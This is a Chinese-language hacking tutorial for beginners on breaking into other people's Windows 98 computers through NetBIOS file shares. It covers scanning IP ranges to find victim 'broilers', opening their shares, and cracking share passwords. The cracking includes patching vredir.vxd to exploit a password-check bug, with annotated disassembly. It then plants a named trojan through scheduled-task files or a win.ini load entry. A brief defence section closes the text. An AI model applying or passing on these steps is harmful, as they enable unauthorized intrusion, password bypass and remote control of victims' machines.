网络上的攻击方法层出不穷,但对于那些想当黑客的初学者而言,利用netbios入侵是首选的入侵方式。
可以说网上有关netbios的文章多如牛毛!可是针对初学者的实用性强的文章却不太多,
比如大多数此类文章对网 络设置都没好好讲过,使许多初学者至今都没成功入侵过。
入侵前的准备:一台用modem上网的家庭电脑(保证自己有充分的支配权进行研究),操作系统最好是使用win98,
再加一个可以显示IP的QQ,还要有一个搜索网络共享肉鸡的好软件,
在这里推荐大家使用国产黑客软件“网络刺客II”。
共享入侵的流程:
1.检查一遍自己的网络设置是否符合入侵要求
有相当多的初学者不能成功入侵共享机器就是因为没有正确设置网络环境:
因为win98默认安装时并没有安装“文件与共享服务”,所以不能进行共享访问。
请先检查爱机有没有网络邻居,如果没有就依次进入“控制 面板”→“网络”,
选中“Microsoft 网络用户”为主网络登录方式,然后点击“文件及打印共享”这一按键 ,再选中“允许其它用户访问我的文件”,
最后按确定后按提示放入win98安装光盘进行补装。重启后你会发现你的桌面上多了个网络邻居,。接下来我们再依次点击“我的电脑”→“拨号网络”的“服务器类型”标签,
选 中“登录网络”这一项并选上“NetBEUI"协议(因为“登录网络”很影响拨号速度,大部分人都早把它取消了, 这也是最易被忽略的共享设置)。经过这样的设置,
我们就可以远程访问共享计算机了。 注:设置共享不需要网卡。
2.搜索Internet上的共享机器
再一次吐血推荐著名的国产黑客软件“网络刺客II”,
推荐它的原因是它有着非常强大的搜索互联网上的共享主机的功能,
并且容易上手(请支持国产软件!)。
我们首先要有一些有效的IP地址作为搜索条件,
现在我 们就打开先前已下载好的完美版QQ吧,在你的QQ好友里随便选个IP地址,
然后打开“主机资源”→“搜索共享主 机”,输入IP的搜索范围,
比如你获得的IP为888.888.888.888(乱写的),
你只要在起始地址里输入 888.888.888.1,
终止地址会自动填上888.888.888.255,最后按开始搜索,
等上几分钟就会有一大把肉鸡的列 表显示出来了。
(如果没有的话就换个IP搜索)
3.入侵方式
入侵方法有好几种,这里我推荐两种最简单的入侵方式:
一种是直接在“开始”→“运行”里输入\\IP(这 个IP就是肉鸡的IP,注意“\\”不能少!)
并回车,然后再过几十秒左右就会出现那台主机所有的共享目录,
这 时你就可以进行访问了,如果你顺利访问C盘,就再试试能不能在里面创建一个文件,
如果能的话,恭喜你!这是一台完全共享C盘的主机,对于这样的主机,
我们可以用木马来完全获得它的控制权,其具体操作分两种情况 ,
这方面在以下一节中详细讲解。还有一种方式是利用“网络刺客II”进入共享主机,
方法也很简单,在列出 的共享主机列表中选中一台主机的共享目录,
右击出现一菜单,点中“映射成网络硬盘”,过一会软件就会提示映射成功,
接下来就快进入“我的电脑”看看战果吧。随着入侵次数的增多,
你可能会常遇到设有共享密码的目录,这种情况你就必须输对共享密码才能访问到共享目录。
关于共享密码的破解方法,还是非常有必要了解的。由于本人水平有限,
在这个方面只能提供两种方法,一种是通过软件进行暴力破解,这样的软件有很多 ,
“网络刺客II”本身就含有强大的破解功能,其具体操作就不讲了。
还有一种破解方式是通过共享目录密码的效验bug进行闪电破解。
你只要对vredir.vxd修改(它存在漏洞,)
下面是文件VSERVER(以下代码分析是转贴的那位bug发现者的所写的资料):
VXD中密码校验过程调用的有BUG的一段程序。
3647是判断客户端密码是不是输入没密码,这时密码项内容是0X20,空格。
不是就转 LOC-0444。
365A判断客户端通过网络通信发过来的加密后密码长度是0X18吗,一般都是。
这转LOC-0447去把共享目录密码加密同网络通信过来的密码比较,
通过TEST EAX,EAX设置ZF标记判断密码对不对。如果密码长度不是0X18,
可能是别的什么方式的密码比较,这儿密码是明码没加密。
再判断密码长度大于9不,共享密码长度是1-8个字母数字等。
下面就是比较密码,后面的循环是以ECX密码长度和ZF标记为结束条件。
显然这儿应该有BUG,这密码长度ECX应该是本声密码的长度,
而这儿密码长度是网络通信发过来的数据。
所以我发过来的数据是1就只比较了一个密码的最前面字节。
如果这一字节对就ZF=0因ECX=0退出结果是校验密码成功。
03647---- loc_0442:----; xref 03635
03647 66| 83 3A 20 cmp--word ptr [edx],20h ;THE SHARE PASSWORD
0364B 75 0D jne--short loc_0444--; Jump if not equal
0364D B8 08460002----mov--eax,8460002h
03652 F9------stc----; Set carry flag
03653 C9-- --leave----; Procedure exit
03654 C3------retn
03655------loc_0443:----; xref 03640, 3645
03655 80 3F 00----cmp--byte ptr [edi],0
03658 74 26----je--short loc_0446; Jump if equal
0365A----loc_0444:------; xref 0364B
0365A 83 F9 18 cmp ecx,18h ; THIS HAS BUG FOUND BY YRG 1999.1.15
0365D 74 24 je--short loc_0447--; Jump if equal
0365F 83 F9 09-- cmp--ecx,9
03662 77 1C-- ja--short loc_0446--; Jump if above
03664 F5---- cmc----; Complement carry
03665 83 D9 00-- sbb--ecx,0
03668 51---- push--ecx
03669 53---- push--ebx
0366A 8B 1D 000137F4--mov--ebx,dword ptr data_0461--; (137F4=137FCh)
03670 8B F2----mov--esi,edx
03672 2B C0----sub--eax,eax
03674 4F------dec--edi
03675------locloop_0445:----------; xref 0367C
03675 47------inc--edi
03676 AC------lodsb--; String [si] to al
03677 8A 04 18----mov--al,[eax][ebx]
0367A 3A 07-- cmp--al,[edi] ;BUG !!! I CAN SET ECX=1
0367C E1 F7 loopdz--locloop_0445 ; Loop if zf=1, ecx>0
0367E 5B-- pop--ebx
0367F 59---- pop--ecx
03680---- loc_0446:--; xref 03658, 3662, 36A1
03680 鶩8---- clc--; Clear carry flag
03681 C9---- leave----; Procedure exit
03682 C3---- retn
03683---- loc_0447: ; xref 0365D
03683 81 EC 000000E4--sub--esp,0E4h
03689 8B C4----mov--eax,esp
0368B 60------pushad--; Save all regs
0368C ?2------push--edx--; PARAMETER_4
0368D 50------push--eax--; PARAMETER_3
0368E 8B 45 08----mov--eax,dword ptr [ebp+PARAMETER_1]
03691 8B 40 24----mov--eax,dword ptr [eax+24h]
03694 50------push--eax--; PARAMETER_2
03695 57------push--edi--; PARAMETER_1
03696 E8 000036A1----call--sub_0054----; (06D3C)
0369B 83 C4 10----add--esp,10h
0369E 85 C0----test--eax,eax
036A0 61------popad--; Restore all regs
036A1 EB DD----jmp--short loc_0446--
好了,那就找客户端发密码的代码。下面是VREDIR。VXD的这段相关代码。
15FCE的18H就是前面的那比较18H的。这儿改成可以1。
CALL SUB-0067是加密输入的密码的过程调用。
15FEA 的EDX是指向输入的密码的指针。
所以15FE9可以改成MOV AL,[EDX],
MOV [ECX],AL
JMP 15FF4
就可以。这样进入有密码的共享目录就可以用字母A-Z,数字0-9等试会很快的进入目录的。
当然最好那儿自动这么变化那AL,免得每次还要输入可以加快速度。
15FC8 8B 4D EC--mov--ecx,dword ptr [ebp-14h]
15FCB 8B 55 F4 --mov--edx,dword ptr [ebp-0Ch]
15FCE 66| C7 41 07 0018--mov--word ptr [ecx+7],18h; PASSWORD LONG
15FD4 83 C1 07----add--ecx,7
15FD7 83 C2 35----add--edx,35h
15FDA 8B 45 F8----mov--eax,dword ptr [ebp-8]
15FDD 83 C0 6C----add--eax,6Ch
15FE0 89 4D F0----mov--dword ptr [ebp-10h],ecx
15FE3 8B 4D EC----mov--ecx,dword ptr [ebp-14h]
15FE6 83 C1 0B----add--ecx,0Bh
15FE9 51------push--ecx ;LOCKED PASSWORD SET HERE
15FEA 52------push--edx ;PASSWORD POINTER
15FEB 50------push--eax
15FEC E8 FFFF0EC5----call--sub_0067 ; LOCK THE PASSWORD----; (06EB6)
15FF1 83 C4 0C----add--esp,0Ch
15FF4 EB 71----jmp--short loc_1765--
然后--
改好后,复制到windos\system下覆盖掉原文件再重启一下就可以进行破解了。
以上两种破解共享密码的方式,本人极力推荐后者,
理论上它可以在几分钟内破解开任何难度的密码。
但是暴力破解不是一点也没用,在万不得已的时候还是要用暴力破解的方式碰碰运气。
至于为什么会仍然要用到远程暴力破解,你再看看下一节就明白了。
4.共享计算机的利用
在这我们只讲完全共享C盘的情况,这种情况是很理想的,
因为我们可以利用植入木马的方式来获得共享电脑的完全控制权。
但问题在于怎么远程运行木马。
我们分两种情况:1.对方电脑开启了计划任务程序,
我们先在自己的电脑上做好木马(推荐使用最新版“广外女生”木马),
然后在自己的计划任务中添加这个运行木马的任务(不要让自己运行),
再到自己电脑的c:\windows\Tasks,把那两个计划任务的文件拷到远程计算机的相应目录,
再用ping IP time命令获知对方电脑的时间,
最后根据这个时间重设远程计算机的计划程序使木马的计划任务过几分钟就运行(可别忘了拷给远程计算机一个木马)。
2.拷给远程计算机一个木马,在 c:\windows\win.ini中配置,在[windows]段中的load=后写上你放置的木马的路径。
这样只要对方重启过计算机后我们就可以进行控制了。
5.共享入侵的防范措施
最简单的方法就是取消所有共享,但如果你非要共享的话(尽量设为只读共享),
那就要加上一个足够复杂的共享密码(混合的8位以上的密码),
然后再下载一个共享目录的密码效验bug补丁。
虽然入 侵者仍然可以试图通过暴力破解来解密,
但是在实际中,只要你的密码够复杂,
对手肯定没戏(这还得归功于共享访问的蜗牛速度)。
最后要提提的是不要中了别人的木马,特别是那些小巧的共享木马。
所以我们上网还要有一个强大的防火墙。国内的天网就是个不错的选择。
|
